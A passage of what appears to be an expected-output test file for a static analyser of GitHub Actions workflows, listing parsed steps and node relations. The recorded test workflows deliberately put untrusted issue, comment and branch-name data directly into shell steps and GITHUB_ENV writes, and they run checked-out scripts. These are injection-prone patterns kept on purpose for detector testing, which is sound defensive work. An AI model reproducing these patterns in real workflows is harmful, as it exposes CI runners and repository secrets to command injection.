.github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:16:15:25 | bash -step | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | 
.github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:34:16:34:25 | bash -step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:16:37:19 | pwsh | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | 
.github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | 
+| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | +| 
.github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | 
venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | 
+| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| 
.github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:16:7:19 | pwsh | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:16:17:19 | bash | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| 
.github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | 
.github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | 
.github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| 
.github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | 
.github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| 
.github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo 
'${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run 